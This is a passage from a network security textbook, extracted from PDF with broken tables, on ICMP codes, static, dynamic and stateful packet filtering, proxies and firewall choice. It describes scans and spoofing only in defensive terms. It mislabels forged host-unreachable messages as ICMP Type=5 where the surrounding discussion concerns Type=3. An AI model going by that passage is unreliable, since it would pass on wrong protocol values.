Note Remember that UDP does not use a flag field. This makes UDP incapable of letting the transmitting system know that a service is not available. To rectify this problem, ICMP is used to notify the transmitting system.
\n4 \nSource \nQuench \nIndicates \nthat the \nreceiving \nsystem or a \nrouting \ndevice along \nthe route is \nhaving \ntrouble \nkeeping up \nwith the \ninbound data \nflow. Hosts \nthat receive \na source \nquench are \nrequired to \nreduce their \n" }, { "page_number": 89, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 89\nTable 5.3: ICMP Type Field Values \nType \nName \nDescription \ntransmission \nrate. This is \nto insure that \nthe receiving \nsystem will \nnot begin to \ndiscard data \ndue to an \noverload \ninbound \nqueue. \n5 \nRedirect \nInforms a \nlocal host \nthat there is \nanother \nrouter or \ngateway \ndevice that \nis better able \nto forward \nthe data the \nhost is \ntransmitting. \nA redirect is \nsent by local \nrouters. \n8 \nEcho \nRequests \nthat the \ntarget \nsystem \nreturn an \necho reply. \nEcho is used \nto verify end-\nto-end \nconnectivity \nas well as \nmeasure \nresponse \ntime. \n9 \nRouter \nAdvertisem\nent \nIs used by \nrouters to \nidentify \nthemselves \non a subnet. \nThis is not a \ntrue routing \nprotocol, as \nno route \ninformation \nis conveyed. \nIt is simply \nused to let \nhosts on the \nsubnet know \nthe IP \naddresses of \n" }, { "page_number": 90, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 90\nTable 5.3: ICMP Type Field Values \nType \nName \nDescription \ntheir local \nrouters. \n10 \nRouter \nSelection \nAllows a \nhost to query \nfor router \nadvertiseme\nnts without \nhaving to \nwait for the \nnext periodic \nupdate. Also \nreferred to \nas a router \nsolicitation. \n11 \nTime \nExceeded \nInforms the \ntransmitting \nsystems that \nthe Time To \nLive (TTL) \nvalue within \nthe packet \nheader has \nexpired and \nthe \ninformation \nnever \nreached its \nintended \nhost. \n12 \nParameter \nProblem \nIs a catchall \nresponse \nreturned to a \ntransmitting \nsystem \nwhen a \nproblem \noccurs that \nis not \nidentified by \none of the \nother ICMP \ntypes. \n13 \nTimestamp \nIs used \nwhen you \nare looking \nto quantify \nlink speed \nmore than \nsystem \nresponsiven\ness. \nTimestamp \nis similar to \nan Echo \nrequest, \nexcept that a \nquick reply \n" }, { "page_number": 91, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 91\nTable 5.3: ICMP Type Field Values \nType \nName \nDescription \nto a \nTimestamp \nrequest is \nconsidered \nmore critical. \n14 \nTimestamp \nReply \nIs a \nresponse to \na Timestamp \nrequest. \n15 \nInformation \nRequest \nHas been \nsuperseded \nby the use of \nbootp and \nDHCP. This \nrequest was \noriginally \nused by self-\nconfiguring \nsystems in \norder to \ndiscover \ntheir IP \naddress. \n16 \nInformation \nReply \nIs a \nresponse to \nan \ninformation \nrequest. \n17 \nAddress \nMask \nRequest \nAllows a \nsystem to \ndynamically \nquery the \nlocal subnet \nas to what is \nthe proper \nsubnet mask \nto be used. If \nno response \nis received, \na host \nshould \nassume a \nsubnet mask \nappropriate \nto its \naddress \nclass. \n18 \nAddress \nMask \nReply \nIs a \nresponse to \nan address \nmask \nrequest. \n30 \nTraceroute \nProvides a \nmore \nefficient \nmeans of \n" }, { "page_number": 92, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 92\nTable 5.3: ICMP Type Field Values \nType \nName \nDescription \ntracing a \nroute from \none IP host \nto another \nthan using \nthe legacy \nTraceroute \ncommand. 
\nThis option \ncan only be \nused when \nall \nintermediary \nrouters have \nbeen \nprogrammed \nto recognize \nthis ICMP \ntype. \nImplementati\non is via a \nswitch \nsetting using \nthe ping \ncommand. \nTable 5.4 identifies valid codes that may be used when the ICMP type is Destination Unreachable (Type=3). \nTable 5.4: ICMP Type 3 Code Field Values \nCode \nName \nDescription \n0 \nNet \nUnreachable \nThe \ndestination \nnetwork \ncannot be \nreached \ndue to a \nrouting \nerror (such \nas no route \ninformation\n) or an \ninsufficient \nTTL value. \n1 \nHost \nUnreachable \nThe \ndestination \nhost \ncannot be \nreached \ndue to a \nrouting \nerror (such \nas no route \ninformation\n) or an \ninsufficient \nTTL value. \n2 \nProtocol \nUnreachable \nThe \ndestination \n" }, { "page_number": 93, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 93\nTable 5.4: ICMP Type 3 Code Field Values \nCode \nName \nDescription \nhost you \ncontacted \ndoes not \noffer the \nservice you \nrequested. \nThis code \nis typically \nreturned \nfrom a host \nwhile all \nothers are \nreturned \nfrom \nrouters \nalong the \npath. \n4 \nFragmentation \nNeeded and \nDon’t \nFragment \nWas Set \nThe data \nyou are \nattempting \nto deliver \nneeds to \ncross a \nnetwork \nthat uses a \nsmaller \npacket \nsize, but \nthe “don’t \nfragment” \nbit is set. \n5 \nSource Route \nFailed \nThe \ntransmitted \npacket \nspecified \nthe route \nthat should \nbe followed \nto the \ndestination \nhost, but \nthe routing \ninformation \nwas \nincorrect. \nTable 5.5 identifies valid codes that may be used when the ICMP type is redirect (Type=5). \nTable 5.5: ICMP Type 5 Code Field Values \nCode \nName \nDescription \n0 \nRedirect \nDatagra\nm for \nthe \nNetwork \n(or \nSubnet) \nIndicates \nthat \nanother \nrouter on \nthe local \nsubnet has \na better \nroute to the \n" }, { "page_number": 94, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 94\nTable 5.5: ICMP Type 5 Code Field Values \nCode \nName \nDescription \ndestination \nsubnet. \n1 \nRedirect \nDatagra\nm for \nthe Host \nIndicates \nthat \nanother \nrouter on \nthe local \nsubnet has \na better \nroute to the \ndestination \nhost. \nEmploying filtering on the values of the Type and the Code fields, we have a bit more granular control than simply \nlooking at source and destination IP addresses. Not all packet filters are capable of filtering on all Types and \nCodes. For example, many will filter out Type=3, which is destination unreachable, without regard to the Code \nvalue. This limitation can cause some serious communication problems. \nLet’s assume you have a network configuration similar to the one shown in Figure 5.4. Your local network uses a \nToken Ring topology, while your remote business partner uses Ethernet. You wish to give your business partner \naccess to your local Web server in order to receive the latest product updates and development information. \n \nFigure 5.4: Problems blocking destination unreachable messages \nNow, let’s also assume that your router is blocking inbound ICMP destination unreachable messages. You have \ndone this in an effort to block Denial of Service (DoS) attacks by preventing external attackers from sending false \nhost unreachable (Type=5, Code=1) messages. Since your router has limited packet filtering ability, you must \nblock all ICMP Type=5 traffic. \nThis can present you with some problems, however. 
When your business partner’s employees try to access your local Web server, they may not be able to view any HTML pages. This problem has the following symptoms—and can be quite confusing:

• The browser on the workstation located on the Ethernet segment appears to resolve the destination host name to an IP address.
• The browser appears to connect to the destination Web server.
• If either router provides session logging, traffic appears to flow between the two systems.
• The log on the local Web server indicates that the workstation connected to the Web server and that a number of files were returned.

So what has gone wrong? Unfortunately, by blocking all Type=3 traffic you have blocked the Fragmentation Needed (Type=3, Code=4) error messages, as well. This prevents the router from adjusting the Maximum Transmission Unit (MTU) of the traffic being delivered.

MTU describes the maximum payload size that can be delivered by a packet of data. In an Ethernet environment, the MTU is 1.5Kb. In a Token Ring environment, the MTU can be as large as 16Kb. When a router receives packets that are too large for a destination network, it will send a request to the transmitting system asking it to break the data into smaller chunks (ICMP Type=3, Code=4). If the router tries to fragment this data itself, it might run into queuing problems if its buffers become full. For this reason, it is easier to have the remote system send smaller packets.

So if we watch the flow of data in Figure 5.4:

1. An Ethernet workstation forms an HTML data request.
2. This request is delivered to the destination Web server.
3. The two systems perform a TCP three-packet handshake using 64-byte packets.
4. Once the handshake is complete, the Web server responds to the data request using a 16Kb MTU.
5. This reply reaches the router on the remote Ethernet network.
6. The Ethernet router issues a fragmentation request (ICMP Type=3, Code=4) back to the Web server asking that it use a 1.5Kb MTU.
7. The request makes it back to the border router at the Token Ring network.
8. This router checks its ACL, determines that it is supposed to drop all destination unreachable messages (ICMP Type=3), and drops the packet.

The fragmentation request never makes it back to your local network, and your remote business partner is unable to view your Web pages. When using static packet filtering, always make sure that you fully understand the ramifications of the traffic you are blocking or allowing to pass through.
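The lesson translates into a filter with per-code granularity. As a hedged illustration (plain functions, not any router’s configuration language), the check below drops inbound destination unreachable messages except the fragmentation-needed replies that MTU negotiation depends on:

def icmp_filter(icmp_type, icmp_code):
    # Drop inbound destination-unreachable messages (Type=3) to blunt forged
    # "host unreachable" floods, but spare Fragmentation Needed (Code=4),
    # which MTU adjustment depends on.
    if icmp_type == 3 and icmp_code != 4:
        return "drop"
    return "pass"

print(icmp_filter(3, 1))   # drop: possibly forged host unreachable
print(icmp_filter(3, 4))   # pass: the fragmentation request gets through
print(icmp_filter(0, 0))   # pass: ordinary echo reply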
Static Packet Filtering Summary

Static packet filters are non-intelligent filtering devices. They offer little protection against advanced types of attack. They look at a minimal amount of information in order to determine which traffic should be allowed to pass and which traffic should be blocked. Many routers have the ability to perform static packet filtering.

Dynamic Packet Filtering

Dynamic filtering takes static packet filtering one step further by maintaining a connection table in order to monitor the state of a communication session. It does not simply rely on the flag settings. This is a powerful feature that can be used to better control traffic flow.

For example, let’s assume that an attacker sends your system a packet of data with a payload designed to crash your system. The attacker may perform some packet trickery in order to make this packet look like a reply to information requested by the internal system. A regular packet filter would analyze this packet, see that the ACK bit is set, and be fooled into thinking that this was a reply to a data request. It would then happily pass the information along to the internal system.

A dynamic packet filter would not be so easily fooled, however. When the information was received, the dynamic packet filter would reference its connection table (sometimes referred to as a state table). When reviewing the table entries, the dynamic packet filter would realize that the internal system never actually connected to this external system to place a data request. Since this information had not been explicitly requested, the dynamic packet filter would throw the packet in the bit bucket.

Dynamic Packet Filtering in Action

Let’s take a look at how dynamic packet filtering works, in order to get a better idea of the increased security it can provide. In Figure 5.5, you can see two separate network configurations: one where the internal host is protected by a static packet filter and one where a dynamic packet filter is used.

Figure 5.5: The differences between static and dynamic packet filtering

Now, let’s look at some access rules to see how each of these two firewall devices would handle traffic control. The ACL on both firewalls may look something like this:

• Allow the protected host to establish any service sessions with the remote server.
• Allow any session that has already been established to pass.
• Drop all other traffic.

The first rule allows the protected host to establish connections to the remote server. This means that the only time a packet with the SYN bit set is allowed to pass is if the source address is from the protected host and the destination is the remote server. When this is true, any service on the remote server may be accessed.

The second rule is a catchall. Basically it says, “If the traffic appears to be part of a previously established connection, let it pass.” In other words, all traffic is OK, provided it is not a packet whose only set flag is SYN.

The third rule states that if any traffic does not fit neatly into one of the first two rules, drop it just to be safe.

Both our firewall devices use the same ACL. The difference is in the amount of information each has available in order to control traffic. Let’s transmit some traffic to see what happens.

In Figure 5.6, the internal system tries to set up a communication session with the remote server. Since this traffic meets the criteria set up in the access control lists, both firewalls allow it to pass.

Figure 5.6: Connection establishment from the protected host

Once the handshake is complete, our protected host makes a data request. This packet will have the ACK bit set, and possibly the PSH bit. When the remote server receives this request, it will also respond with the ACK bit set and possibly the PSH bit, as well. Once the data transfer is complete, the session will be closed, each system transmitting a packet with the FIN bit set.

Figure 5.7 shows this established session passing data.
Note that we have no problems passing our firewall devices because of our second rule: “Allow any session that has already been established to pass.” Each firewall is making this determination in a slightly different way, however.

Figure 5.7: An established session between the two hosts

Our static packet filter is simply looking at the flag field to see if the SYN bit is the only bit set. Since this is not true, the static packet filter assumes that this data is part of an established session and lets it pass through.

Our dynamic packet filter is doing the same check, but it also created a state table entry when the connection was first established. Every time the remote server tries to respond to the protected host, the state table is referenced to insure the following:

• The protected host actually made a data request.
• The source port information matches the data request.
• The destination port information matches the data request.

In addition, the dynamic packet filter may even verify that the sequence and acknowledgment numbers all match. If all this data is correct, the dynamic packet filter also allows the packets to pass. Once the FIN packets are sent by each system, the state table entry will be removed. Additionally, if no reply is received for a period of time (anywhere from one minute to one hour, depending on the configuration), the firewall will assume that the remote server is no longer responding and will again delete the state table entry. This keeps the state table current.

Now let’s say that Woolly Attacker notices this data stream and decides to attack the protected host. The first thing he tries is a port scan on the protected system to see if it has any listening services. As you can see in Figure 5.8, this scan is blocked by both firewall devices, because the initial scanning packets have the SYN bit set and all other bits turned off.

Figure 5.8: Both filtering methods can block a port scan.

Not to be put off, Woolly Attacker attempts to perform a FIN scan by transmitting packets with the ACK and FIN bits set to 1. Now the results are a bit different. Since the packet filter is simply looking for the SYN bit being set to 1, it happily passes this traffic along, as this condition has not been met.

Our dynamic packet filter, however, is a bit more fussy. It recognizes that the SYN bit is not set and proceeds to compare this traffic to the state table. At this point, it realizes that our protected host has never set up a communication session with Woolly Attacker. There is no legitimate reason that Woolly Attacker should be trying to end a session if our protected host never created one in the first place. For this reason, the traffic would be blocked. This is shown in Figure 5.9.

Figure 5.9: The effects of performing a FIN scan

So what if Woolly Attacker tries to spoof the firewall by pretending to be the remote server? In order for him to perform this attack successfully, a number of conditions would have to be met:

• Woolly Attacker would have to spoof or assume the IP address of the remote server.
• If the address has been assumed, Woolly Attacker might have to take further measures to insure that the remote server cannot respond to requests on its own.
• If the address has been spoofed, Woolly Attacker would need some method of reading replies off the wire.
\nƒ \nWoolly Attacker would need to know the source and destination service ports being used \nso that his traffic will match the entries in the state table. \nƒ \nDepending on the implementation, the acknowledgment and sequence numbers might \nhave to match, as well. \n" }, { "page_number": 99, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 99\nƒ \nWoolly Attacker would have to manipulate the communication session fast enough to \navoid timeouts, both on the firewall and on the protected host. \nSo while it is possible to launch this type of attack, it is not very easy to succeed. Clearly, Woolly Attacker would \nhave to be very knowledgeable and feel that he has much to gain by going to all this effort. \nKeep in mind that this discussion is theory only. Your actual mileage with a specific firewall product may vary. \nFor example, at the time of this writing, Check Point’s FireWall-1 product (which is a dynamic packet filter) has a \ntouted feature that allows the state table to be maintained even after a rule set change. Unfortunately, this feature \nalso means that state is not always maintained as effectively as it should be. In the FIN scan attack just described, \nCheck Point’s FireWall-1 would have passed along the scan packets, as well. \nUDP Traffic and Dynamic Packet Filtering \nAs you have seen, static packet filtering has some real problems handling UDP traffic. This is because the UDP \nheader has zero information regarding connection state. This is where dynamic packet filtering can be extremely \nuseful, as the firewall itself is able to remember state information. It does not rely on information within the packet \nheader but maintains its own tables regarding the state of all sessions. \nTip \nIt is strongly advised that dynamic packet filtering be used instead of static filtering when \nUDP traffic must be allowed through. The addition of state table information makes this \nfirewall method far more secure with no loss in service. \nIs My Transport Supported? \nThe implementation of dynamic packet filtering is transport specific. That means it has to be specifically \nimplemented for each protocol transport, such as TCP, UDP, and ICMP. When choosing a dynamic packet filter, \nmake sure that the firewall is capable of maintaining state for all transports that you wish to use. \nFor example, with version 1.x of FireWall-1, state was only maintained with UDP traffic. While it is true that this \nis where such traffic control was most needed, TCP and ICMP were regulated in the same manner as a static \npacket filter. It was not until version 2.x that state was maintained for TCP traffic, as well. \nDynamic Packet Filter Summary \nDynamic packet filters are intelligent devices that make traffic-control decisions based on packet attributes and \nstate tables. State tables enable the firewall device to “remember” previous communication packet exchanges and \nmake judgments based on this additional information. \nThe biggest limitation of a dynamic packet filter is that it cannot make filtering decisions based upon payload, \nwhich is the actual data contained within the packet. In order to filter on payload, you must use a proxy-based \nfirewall. \nStateful Filtering \nStateful filtering improves upon the power of dynamic packet filtering. First implemented by Check Point under \nthe name “Stateful Multilevel Inspection,” stateful rules are protocol-specific, keeping track of the context of a \nsession (not just its state). 
Stateful Filtering

Stateful filtering improves upon the power of dynamic packet filtering. First implemented by Check Point under the name “Stateful Multilevel Inspection,” stateful rules are protocol-specific, keeping track of the context of a session (not just its state). This allows filtering rules to differentiate between the various connectionless protocols (like UDP, NFS, and RPC), which—because of their connectionless nature—were previously immune to management by static filtering and were not uniquely identified by dynamic filtering.

The greatest addition that stateful filtering provides to dynamic filtering is the ability to maintain application state, not just connection state. Application state allows a previously authenticated user to create new connections without reauthorizing, whereas connection state just maintains that authorization for the duration of a single session.

An example of this would be a firewall that allows internal access based on per-user authentication. If an authenticated user attempts to open another browser, a dynamic filtering device would prompt the user for his password again. Stateful filtering, however, would recognize that a pre-existing (and concurrent) connection is being maintained with that same machine, and would automatically authorize the additional session.

Proxies

A proxy server (sometimes referred to as an application gateway or forwarder) is an application that mediates traffic between two network segments. Proxies are often used instead of filtering to prevent traffic from passing directly between networks. With the proxy acting as mediator, the source and destination systems never actually “connect” with each other. The proxy plays middleman in all connection attempts.

How a Proxy Passes Traffic

Unlike its packet-filtering counterparts, a proxy does not route any traffic. In fact, a properly configured proxy will have all routing functionality disabled. As its name implies, the proxy stands in or speaks for each system on each side of the firewall.

For an analogy, think of two people speaking through a language interpreter. While it is true these two people are carrying on a conversation, they never actually speak to one another. All communication passes through the interpreter before being passed on to the other party. The interpreter might have to clean up some of the language used, or filter out comments or statements that might seem hostile.

To see how this relates to network communications, refer to Figure 5.10. Our internal host wishes to request a Web page from the remote server. It formulates the request and transmits the information to the gateway leading to the remote network, which in this case is the proxy server.

Figure 5.10: A proxy mediating a communication session

Once the proxy receives the request, it identifies what type of service the internal host is trying to access. Since in this case the host has requested a Web page, the proxy passes the request to a special application used only for processing HTTP sessions. This application is simply a program running in memory that has the sole function of dealing with HTTP communications.

When the HTTP application receives the request, it verifies that the ACL allows this type of traffic. If the traffic is acceptable, the proxy formulates a new request to the remote server—only it uses itself as the source system. In other words, the proxy does not simply pass the request along; it generates a new request for the remote information.

This new request is then sent to the remote server. If the request were checked with a network analyzer, it would look like the proxy had made the HTTP request, not the internal host. For this reason, when the remote server responds, it responds to the proxy server.

Once the proxy server receives the reply, it again passes the response up to the HTTP application. The HTTP application then scrutinizes the actual data sent by the remote server for abnormalities. If the data is acceptable, the HTTP application creates a new packet and forwards the information to the internal host.

As you can see, the two end systems never actually exchange information directly. The proxy constantly butts into the conversation to make sure that all goes securely.
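A rough sketch of this mediation, using nothing but Python’s standard socket library, may make the “two sessions meeting in the middle” point clearer. This is a single-shot toy, not a hardened proxy: it assumes a plain HTTP request with a Host: header and performs no real inspection.

import socket

def proxy_once(listen_port=8080):
    # Accept one connection from an internal host, re-issue its request to
    # the remote server under the proxy's own name, then relay the reply.
    with socket.socket() as srv:
        srv.bind(("", listen_port))
        srv.listen(1)
        client, _ = srv.accept()
        request = client.recv(65535)
        # Pull the destination out of the Host: header (crude on purpose).
        host = [line.split(":", 1)[1].strip()
                for line in request.decode().splitlines()
                if line.lower().startswith("host:")][0]
        # Two separate TCP sessions meet here: nothing is ever routed, and
        # this is where an ACL check or payload inspection would occur.
        with socket.create_connection((host, 80)) as remote:
            remote.sendall(request)      # a brand-new request, new source
            reply = remote.recv(65535)   # the server answers the proxy
        client.sendall(reply)            # the inspected reply goes inside
        client.close()

From the remote server’s point of view, the only system it has ever spoken to is the proxy.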
Once the proxy server receives the reply, it again passes the response up to the HTTP application. The HTTP application then scrutinizes the actual data sent by the remote server for abnormalities. If the data is acceptable, the HTTP application creates a new packet and forwards the information to the internal host.
As you can see, the two end systems never actually exchange information directly. The proxy constantly butts into the conversation to make sure that all goes securely.
Since proxies must "understand" the application protocol being utilized, they can also implement protocol-specific security. For example, an inbound FTP proxy can be configured to filter out all put and mput requests received by an external system. This could be used to create a read-only FTP server: people outside the firewall would be unable to send the FTP server the commands required to initiate a file write. They could, however, perform a file get, which would allow them to receive files from the FTP server.
Tip
Proxy servers are application specific. In order to support a new protocol via a proxy, a proxy must be developed for that protocol. If you select a proxy firewall, make sure that it supports all the applications you wish to use.
There are stripped-down proxies known as plug gateways. These are not true proxies because they do not understand the application they are supporting. Plug gateways simply provide connectivity for a specific service port and offer little benefit beyond dynamic filtering.
Client Configuration in a Proxy Environment
Some proxy servers require all internal hosts to run connection software such as SOCKS or a modified winsock.dll file. Each of these programs serves a single function: to forward all non-local traffic to the proxy. Depending on the environment, this can be extremely beneficial or a complete pain in the rear quarter.
Benefits of a Proxy Client
There are a number of benefits to running proxy client software. The first is ease of configuration. Since the client is designed to forward all non-local data requests to the proxy, the only required configuration information is a valid IP address and subnet mask. Router and DNS parameters can be ignored, because this information only needs to be configured on the proxy.
In fact, many proxies do not even require that you use IP as a protocol. For example, Microsoft Proxy Server 2.0 ships with a replacement winsock.dll file, which allows IPX to be used on the local workstations. Once the traffic reaches the proxy, it is translated to IP and forwarded to the remote server. For an environment that is predominantly IPX-based, this can be a very simple solution that avoids running additional protocols on the network.
Proxy clients can also offer transparent authentication in order to validate outbound connection attempts based on logon name and password. For example, Novell's BorderManager integrates with NetWare Directory Services (NDS) to transparently authenticate users as they access the Internet. As long as a user is authenticated to NDS, that user is not prompted for a password when accessing Internet resources.
\nNote \nUser authentication of outbound sessions is used for increased logging and management. \nIf authentication is not used, a firewall must rely on the source IP address to identify who \nhas accessed which Internet resources. This can be a problem; all a user has to do in order \nto change her identity is change her IP address. This can be a serious problem in a DHCP \nor bootp environment if you wish to track all of your users. \nDrawbacks to a Proxy Client \nUnfortunately, there are a number of drawbacks to using a proxy client. The first is deployment. If you have 1,000 \nmachines that will need to use the proxy server, plan on loading additional software on each of these machines. \nSoftware compatibility may also be a problem; some applications may not be compatible with the replacement \nwinsock.dll file. For example, many Winsock replacements are still written to the 1.x specification, although there \nare now applications that require Winsock 2.x. \nAnd what if many of your desktop machines do not run Windows? Many proxies do not provide client software \nfor any operating system other than Windows. In this case, you have to be sure that all IP applications you wish to \nuse are SOCKS compliant. While there are SOCKS versions of many IP applications such as telnet and FTP, it’s \nall too often the case that a favorite application is not SOCKS compliant. \nClient software can also be a problem for mobile or laptop users. For example, let’s say you are a laptop user who \nconnects to the local network during the day and dials in to your Internet Service Provider (ISP) in the evening. In \nthis case, you would have to make sure that your proxy client is enabled during the day, but disabled at night. Not \nexactly the type of procedure you’d want to have your pointy-haired boss performing on a daily basis. \nFinally, a proxy client can be a real problem if you have multiple network segments. This is because the proxy \nclient expects to forward all non-local traffic to the proxy server—not a good solution if you have a large network \nenvironment with many subnets. While some configurations do allow you to exempt certain subnets from being \nforwarded to the proxy, this typically involves modifying a text file stored on the local workstation. Again, if you \nadminister 1,000 desktop machines, plan on putting in quite a few long nights just to update all your desktop \nmachines regarding a subnet address change. \nTransparent Proxies \nNot all proxies require special client software. Some can operate as a transparent proxy, which means that all \ninternal hosts are configured as though the proxy were a regular router leading to the Internet. As the proxy \nreceives traffic, it processes the traffic in a fashion similar to our example in Figure 5.10. \nIf you decide that a proxy firewall is the best fit for your security requirements, make sure you also decide whether \nyou wish to use a transparent or a non-transparent proxy. The marketing material for many proxy packages can be \na bit vague about whether the package requires special client software. Typically, if a product claims to support \nSOCKS, it is not a transparent proxy. Make sure you know the requirements before investing in a firewall \nsolution. \nFiltering Java, ActiveX, and HTML Scripts \nAs you have seen, proxies can analyze the payload of a packet of data and make decisions as to whether this \npacket should be passed or dropped. 
This is a powerful feature that gives the administrator far more ability to scrutinize what type of data should be allowed into the network. When it comes to content filtering, the first thing most people think about is Java and ActiveX.
Java is a portable programming language. Portable means it is designed to be run on any network operating system. Typically, Java support is accomplished through the use of a Java-aware Web browser. Java programs are referred to as applets.
ActiveX is a specialized implementation of a Microsoft Object Linking and Embedding (OLE) or Component Object Model (COM) object. With ActiveX, you create a self-sufficient program known as an ActiveX control. The benefit to an ActiveX control is that it can be shared across multiple applications. ActiveX is not a programming language. ActiveX controls are created using some other programming language such as C++, PowerBuilder, Visual Basic, or even Microsoft Java.
Java applets and ActiveX controls can be pulled down from a server and run on any compatible Web browser. Functionality for these programs can include anything from dancing icons to shared applications. There are few limits to the types of programs that can be created.
This is where our problems begin. While both Java and ActiveX were developed with security in mind (Java probably more so than ActiveX), quite a few exploits have been discovered in both.
Note
To have a look at the kinds of exploits that can be performed, point your Web browser at www.digicrime.com. This site contains a number of Java and ActiveX exploits that show just how malicious these programs can be in the wrong hands.
Now that you know why using Java and ActiveX can be a bad thing, the question is, what can you do about it? Many proxy firewalls provide the ability to filter out some or all Java and ActiveX programming code. This allows your users to continue accessing remote Web sites—without fear of running a malicious application.
For example, FireWall-1 includes proxy applications that are referred to as security servers. Security servers give the firewall administrator the ability to identify certain program codes that he wishes to filter out. Figure 5.11 shows the URI dialog box that allows the FireWall-1 administrator to pick and choose the types of code he wants to filter out.
Figure 5.11: The URI Definition dialog box allows you to filter programming code.
The HTML Weeding check boxes allow the administrator to filter out all tag references to Java scripts, Java applets, or even ActiveX controls. The Block JAVA Code check box causes the firewall to filter out any and all Java programming code. The combination of these options provides some flexibility in determining what types of data are allowed to reach your internal Web browsers.
Note
Enabling these features blocks both good and bad code, without distinguishing between the two. In other words, your choices are all or nothing. There are, however, proxies that can selectively filter out only "known to be malicious" programming code. While this allows some Java and/or ActiveX to be passed through the proxy, it does so at a reduced level of security. These proxies can only filter out known problems; they cannot help with exploits that have yet to be discovered. Unless you stay on top of the latest exploits, you may still end up letting some malicious code past your firewall.
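As a rough illustration of the HTML weeding idea, the sketch below strips applet, object, embed, and script tags from a page before it reaches the browser. The regular expression and function name are invented for the example, and this is nowhere near a production-quality filter (a real product must also handle encodings and deliberately malformed markup):

# A minimal sketch of "HTML weeding": remove active-content tags.
# Illustration only; NOT a safe or complete filter.
import re

# Strip <script>, <applet>, and <object> blocks (with their contents),
# plus any standalone <embed> tags.
BLOCKED = re.compile(
    r"<script\b.*?</script\s*>|<applet\b.*?</applet\s*>|"
    r"<object\b.*?</object\s*>|<embed\b[^>]*>",
    re.IGNORECASE | re.DOTALL,
)

def weed(html):
    """Return the page with active-content tags removed."""
    return BLOCKED.sub("<!-- removed by proxy -->", html)

page = '<html><body>Hi<applet code="Evil.class"></applet></body></html>'
print(weed(page))
# prints: <html><body>Hi<!-- removed by proxy --></body></html>

As with the check boxes in Figure 5.11, a filter like this is all or nothing: it cannot tell a malicious applet from a benign one.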
What Type of Firewall Should I Use?
This section title asks a completely loaded question. Post this question to any firewall discussion list, and you are guaranteed to start a flame war. (For real fun, follow this question up with "Should I run my firewall on Macintosh, UNIX, Linux, NT, Windows 2000, or a vendor-specific platform?")
There are no clear-cut absolutes for choosing a particular type of firewall solution. Anyone who tells you otherwise has a product to push. Cost, business need, and security requirements should all be considered when you are looking for a proper solution.
Since static filtering is considered weak, it is the lowest level of perimeter security. It is also the most basic, however, as static filtering ability is built into most routers. If you have a permanent WAN connection, chances are you are using a router. If you have a router, you should be performing static packet filtering as a minimum.
Dynamic Filtering or Proxy?
Each of these firewalls has its strengths and weaknesses. Dynamic filtering is typically easier to work with than a proxy and has a better ability to meet most business needs, but it is not quite as competent at screening traffic as a proxy server may be. While both a dynamic packet filter and a proxy will block traffic known to be bad, each can act a little differently in the face of dubious traffic.
For example, let's say you have two firewalls: a dynamic packet filter and a proxy. Each receives a packet of data that has the high-priority flag set for a certain application, and neither has been programmed as to how to handle this type of data. Typically (but not always), the dynamic packet filter would pass questionable traffic, while the proxy would drop it. In addition, since the proxy is application aware, it could further check the contents of the actual data, while the dynamic packet filter could not. Again, this is a theoretical comparison between two forms of perimeter protection. Your actual mileage may vary, depending on the specific product you choose.
Proxies tend to be a bit more secure, but it can be more difficult to get them to fit a particular business need. For example, many proxies have trouble supporting modern services such as Microsoft's NetMeeting or Real Audio and Video. So while the level of perimeter security is higher, this is of little comfort if a proxy is unable to meet the business requirements of the organization it is protecting.
The most secure perimeter security device is a pair of wire cutters. Since few organizations are willing to use this security device, and most want Internet connectivity, some level of risk must be assumed. A proper firewall selection meets all the business needs of connectivity while employing the highest level of security possible. Additionally, a good firewall product will incorporate both dynamic packet filtering and proxy technology in order to provide the highest level of security and flexibility.
Which Platform Should I Choose?
This topic has been the subject of many a religious war. Search the archives of any firewall mailing list and you will find volumes on this specific topic.
Just like a religious belief system, the selection of a proper firewall platform is a personal decision that you should make only after proper investigation.
This section is not going to tell you which platform to choose; it will simply point out some of the strengths and weaknesses of each platform and leave the final decision up to you. Just like choosing a proper firewall product, choosing the operating system to run it on is clearly not a one-size-fits-all prospect.
One primary distinction that exists is between server-based and appliance-based firewalls. A server-based firewall is an application that runs on top of an operating system. An example is Check Point's FireWall-1, which runs on Windows NT and 2000. An appliance-based firewall, or integrated solution, is a firewall application that runs on proprietary hardware and software. The Cisco PIX firewall, for example, is an integrated device: the entire system is incapable of being anything other than a firewall, and it does not include a hard drive or other traditional components of a server. Because of their integrated and proprietary nature, these boxes are traditionally faster, more robust, and considered more secure than server-based firewalls. Server-based firewalls, on the other hand, often provide additional configuration and support options, and can be cheaper than the integrated solutions.
Server-Based Firewalls
Server-based firewalls are applications that run on top of an operating system. Firewalls exist for the following platforms:
ƒ Macintosh
ƒ Unix
ƒ Linux
ƒ Microsoft Windows NT
ƒ Microsoft Windows 2000
Macintosh
As unlikely a choice as this might seem to most system administrators, there are firewall products designed for the Macintosh operating system. And although some system administrators might scoff at the idea, there are impressive examples of secure Mac-based Internet systems—including the United States Army, which has been hosting its Web site on a WebSTAR server running the Macintosh OS since the early part of 1999, and that server hasn't been successfully hacked since.
However, the Macintosh operating system is undergoing a radical change, which will culminate in 2001 with the release of the consumer version of OS X (10). OS X is based on the NeXTStep operating system, which itself is based on the Mach kernel and BSD (Berkeley Software Distribution of UNIX). Even though Apple has released the source code of OS X, it has made significant changes to the kernel to adapt it to the Macintosh platform. It has yet to be seen how these changes (along with Apple-specific implementations of DNS and HTTP) will affect its security as a whole.
Macintosh Strengths So what distinguishes the Macintosh as an operating system from other notable server OSs? There is a widespread belief that running a firewall on a Mac will be inherently more secure simply because most hackers are unfamiliar with Mac technology. And while there are some reported vulnerabilities in applications that run on the Mac, very few reports exist about weaknesses of the operating system itself.
There is also the ease of configuration. Because the Macintosh is GUI-only and offers few network services (beyond basic file and print), complexity (the bane of any security system) is greatly reduced.
